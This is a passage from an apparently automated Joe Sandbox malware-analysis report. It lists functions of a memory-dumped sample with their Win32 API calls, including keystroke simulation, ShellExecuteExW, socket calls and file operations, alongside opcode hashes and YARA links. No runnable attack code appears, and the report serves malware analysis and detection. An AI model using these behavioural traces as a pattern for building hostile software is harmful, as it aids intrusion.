MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F8D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F8D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F8D716
ShowWindow.USER32(00000003,00000000), ref: 00F8D735
InvalidateRect.USER32(?,00000000,00000001), ref: 00F8D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 00F8D77D

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: ef71156821d2803ab4a34dec83fd44115f1a62e130894c10207bf9c316fc739e
Instruction ID: adae4ea39dbe4fe5745fbd4794e8090feefc5ca6bedf2af04e035ef7896931b8
Opcode Fuzzy Hash: ef71156821d2803ab4a34dec83fd44115f1a62e130894c10207bf9c316fc739e
Instruction Fuzzy Hash: E2B17A75A00219EFDF18DF68C985BED7BB1BF08711F088169EC489F295E734A990EB50

Function 00F02A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F3C1C7,00000004,00000000,00000000,00000000), ref: 00F02ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00F3C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00F02B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00F3C1C7,00000004,00000000,00000000,00000000), ref: 00F3C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F3C1C7,00000004,00000000,00000000,00000000), ref: 00F3C286

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 5cf545b16ddc8238274bce1aaafdeaeea0e16fc161abdd7553717a569334148d
Instruction ID: 7d29e467a2aba2482089b651fc8fb25459dd41b8a3d8ac325cf6c362bed23969
Opcode Fuzzy Hash: 5cf545b16ddc8238274bce1aaafdeaeea0e16fc161abdd7553717a569334148d
Instruction Fuzzy Hash: 04413F31B046809EDBB59B28CC8CB7B7B92AB85334F14881DE047925E1CA79E885F770

Function 00F670C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00F670DD

Part of subcall function 00F20DB6: std::exception::exception.LIBCMT ref: 00F20DEC
Part of subcall function 00F20DB6: __CxxThrowException@8.LIBCMT ref: 00F20E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00F67114
EnterCriticalSection.KERNEL32(?), ref: 00F67130
_memmove.LIBCMT ref: 00F6717E
_memmove.LIBCMT ref: 00F6719B
LeaveCriticalSection.KERNEL32(?), ref: 00F671AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00F671BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 00F671DE

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 713e91b30c54afab9372276b46dbbe6d81b80a3e3a89b215e0c3314e3522077d
Instruction ID: 9fff2bff5ee7d9c78c7b63f1553b3c699a182a38930e50dcef40459cdd900b90
Opcode Fuzzy Hash: 713e91b30c54afab9372276b46dbbe6d81b80a3e3a89b215e0c3314e3522077d
Instruction Fuzzy Hash: 2B318F32900219EFCF00EFA4DC85AAEB778EF45710F1541B5F904AB256DB349E54EBA0

Function 00F861D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00F861EB
GetDC.USER32(00000000), ref: 00F861F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F861FE
ReleaseDC.USER32(00000000,00000000), ref: 00F8620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F86246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F86257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F8902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00F86291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F862B1

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: ce2b8039c5ad0308fcd5aa854c2dd27353d8015ff39f4c86c0c676b2d80c6250
Instruction ID: 7f172c2d1a558e3c055792f571bfb8a487a3c29bafa6b590ede0be7482332514
Opcode Fuzzy Hash: ce2b8039c5ad0308fcd5aa854c2dd27353d8015ff39f4c86c0c676b2d80c6250
Instruction Fuzzy Hash: 48317A72201214BFEF119F50CC8AFFA3BA9EF49765F0440A5FE08DA292D6B59C41DB64

Function 00F5BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00F5BBC4
_memcmp.LIBCMT ref: 00F5BBE6
_memcmp.LIBCMT ref: 00F5BBFE
_memcmp.LIBCMT ref: 00F5BC11
_memcmp.LIBCMT ref: 00F5BC2B
_memcmp.LIBCMT ref: 00F5BC3E
_memcmp.LIBCMT ref: 00F5BC56
_memcmp.LIBCMT ref: 00F5BC71

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 6fbef07eac75edd1cb0e03a36172818309ee227bd3fe89fed3881980caa104fa
Instruction ID: 556968ef896845f343f4194950c31dc1f533cf4c647ca5f2b466e4874c6ec407
Opcode Fuzzy Hash: 6fbef07eac75edd1cb0e03a36172818309ee227bd3fe89fed3881980caa104fa
Instruction Fuzzy Hash: 25210B62A012167BF604B611AD42FFF735CAE6236AF044010FF0896647EB58DE19F1AA

Function 00F6EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

Part of subcall function 00F1FC86: _wcscpy.LIBCMT ref: 00F1FCA9

_wcstok.LIBCMT ref: 00F6EC94
_wcscpy.LIBCMT ref: 00F6ED23
_memset.LIBCMT ref: 00F6ED56

Strings

X, xrefs: 00F6ED93

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 612e1e6bb56e4ff36edef30d968cd944ddab5b796374d6e9c3e500f7a9e9d20c
Instruction ID: 916175fd24353f13077689a8db8430c677f8acd3f466f7fef92a6ef4efacbbe8
Opcode Fuzzy Hash: 612e1e6bb56e4ff36edef30d968cd944ddab5b796374d6e9c3e500f7a9e9d20c
Instruction Fuzzy Hash: DCC19275A083019FC714EF24DD41A5AB7E4FF85320F00896DF8999B2A2DB74ED45EB42

Function 00F76B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00F76C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F76C21
WSAGetLastError.WSOCK32(00000000), ref: 00F76C34
htons.WSOCK32(?,?,?,00000000,?), ref: 00F76CEA
inet_ntoa.WSOCK32(?), ref: 00F76CA7

Part of subcall function 00F5A7E9: _strlen.LIBCMT ref: 00F5A7F3
Part of subcall function 00F5A7E9: _memmove.LIBCMT ref: 00F5A815

_strlen.LIBCMT ref: 00F76D44
_memmove.LIBCMT ref: 00F76DAD

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: a75717e49692e9df853545993fd7ff139688be2aa8456ba973785508896f8d26
Instruction ID: 55886b0d0d9b6103ddd0c91ecb2426487e22207981b733ba06faa26f226d4e89
Opcode Fuzzy Hash: a75717e49692e9df853545993fd7ff139688be2aa8456ba973785508896f8d26
Instruction Fuzzy Hash: 9A81D271608700AFC710EB24CC81E6BB7A8AF84724F14891DF559DB2D2DA74DD05EB52

Function 00F01424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 392f81b93f73cb1a1462a6b2759a225af6961bb5d96766ed1106f35a3377a219
Instruction ID: 1e5562980aad451a56f924f006a7e0949a3a845650ac9be440ad0e5ddbf352d9
Opcode Fuzzy Hash: 392f81b93f73cb1a1462a6b2759a225af6961bb5d96766ed1106f35a3377a219
Instruction Fuzzy Hash: 02716F35900109EFCB14CF98CC89ABEBB75FF86324F248159F915AA291C734AA51EB60

Function 00F8B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(018C59C8), ref: 00F8B3EB
IsWindowEnabled.USER32(018C59C8), ref: 00F8B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F8B4DB
SendMessageW.USER32(018C59C8,000000B0,?,?), ref: 00F8B512
IsDlgButtonChecked.USER32(?,?), ref: 00F8B54F
GetWindowLongW.USER32(018C59C8,000000EC), ref: 00F8B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F8B589

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 652559afd2beae0ce68ac176c59e887253799c40903041fe97c41e6676c39a9a
Instruction ID: 1f1eae418a1d635627f9a0a6d8ddafe6dc3b8422654e97caa407c572c04c17c1
Opcode Fuzzy Hash: 652559afd2beae0ce68ac176c59e887253799c40903041fe97c41e6676c39a9a
Instruction Fuzzy Hash: 2371A034A00608EFDB20EF94C896FFA7BB5EF09320F144159F946972A2C735A980FB50

Function 00F7F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F7F448
_memset.LIBCMT ref: 00F7F511
ShellExecuteExW.SHELL32(?), ref: 00F7F556

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

Part of subcall function 00F1FC86: _wcscpy.LIBCMT ref: 00F1FCA9

GetProcessId.KERNEL32(00000000), ref: 00F7F5CD
CloseHandle.KERNEL32(00000000), ref: 00F7F5FC

Strings

@, xrefs: 00F7F525

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: d264863de6f44730a67f4829273bab3e44a10bf893a39f5eb1a7ae8cb35e47f8
Instruction ID: 607acaf87e1db74117a9d78ff2a76a0d693a207e7484197c17a4206a2c3894d9
Opcode Fuzzy Hash: d264863de6f44730a67f4829273bab3e44a10bf893a39f5eb1a7ae8cb35e47f8
Instruction Fuzzy Hash: CA61B1B1A00619DFCB04DF54C8819AEB7F5FF48320F54806AE859AB391DB34AD45EF91

Function 00F60F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00F60F8C
GetKeyboardState.USER32(?), ref: 00F60FA1
SetKeyboardState.USER32(?), ref: 00F61002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00F61030
PostMessageW.USER32(?,00000101,00000011,?), ref: 00F6104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00F61095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F610B8

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 6d334a990323f1257267c8efeb600213589e5e844033314c3dbbb8f180879ecc
Instruction ID: b7a80be555aa8d59ce9c107201ba56cac7d1ab5dd75c8564103917981fa351e4
Opcode Fuzzy Hash: 6d334a990323f1257267c8efeb600213589e5e844033314c3dbbb8f180879ecc
Instruction Fuzzy Hash: 185102A0A087D53DFB3642348C15BBBBEA9AB06314F0C8589E1D5868D3D6D9ECC8F751

Function 00F60D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00F60DA5
GetKeyboardState.USER32(?), ref: 00F60DBA
SetKeyboardState.USER32(?), ref: 00F60E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F60E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F60E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F60EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F60EC9

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 511195e93997e9479921e7c1f70c165200091933b66633daf5f69c6e79902c17
Instruction ID: 5de3277be4b604cb7f5768c95fc0cad89c0c2cda4f2a4618777b8daee32348fb
Opcode Fuzzy Hash: 511195e93997e9479921e7c1f70c165200091933b66633daf5f69c6e79902c17
Instruction Fuzzy Hash: B45126A09447D53DFB3283748C55BBB7FA9AB06310F1C8989E1D44A4C3DB96AC98F350

Function 00F655FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00F6560A
_wcsncpy.LIBCMT ref: 00F6563F
_wcsncpy.LIBCMT ref: 00F65671
_wcsncpy.LIBCMT ref: 00F656A4
_wcsncpy.LIBCMT ref: 00F656E6
_wcsncpy.LIBCMT ref: 00F65720
_wcsncpy.LIBCMT ref: 00F6574F

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 89296586db167c09f09cbf64bc40156f713618be7be130353b46cce7d02e881d
Instruction ID: d62a33a4e3ae6078c69c232dd6d35297ce375d190ae3ae157845d153e0767c21
Opcode Fuzzy Hash: 89296586db167c09f09cbf64bc40156f713618be7be130353b46cce7d02e881d
Instruction Fuzzy Hash: 5041B565C1062876CB11EBB4DC469CFB3B8DF04710F508956F519E3221FB38A385E7A6

Function 00F63671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F6466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F63697,?), ref: 00F6468B

Part of subcall function 00F6466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F63697,?), ref: 00F646A4

lstrcmpiW.KERNEL32(?,?), ref: 00F636B7
_wcscmp.LIBCMT ref: 00F636D3
MoveFileW.KERNEL32(?,?), ref: 00F636EB
_wcscat.LIBCMT ref: 00F63733
SHFileOperationW.SHELL32(?), ref: 00F6379F

Strings

\*.*, xrefs: 00F6372D

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 96085bbe5ed9f3fb1eb75de73fbe1b40bfd0236aa5b49c9bbb01d704e0b8faeb
Instruction ID: a081b3c5f92d45efc4610af9fbdbf7606f39a2643350cb4eaab4b27cd26db671
Opcode Fuzzy Hash: 96085bbe5ed9f3fb1eb75de73fbe1b40bfd0236aa5b49c9bbb01d704e0b8faeb
Instruction Fuzzy Hash: CB419471508348AEC751EF64D8419EFB7E8EF89350F40082EF499C3251EB39D689EB52

Function 00F87291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F872AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F87351
IsMenu.USER32(?), ref: 00F87369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F873B1
DrawMenuBar.USER32 ref: 00F873C4

Strings

0, xrefs: 00F8729E

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
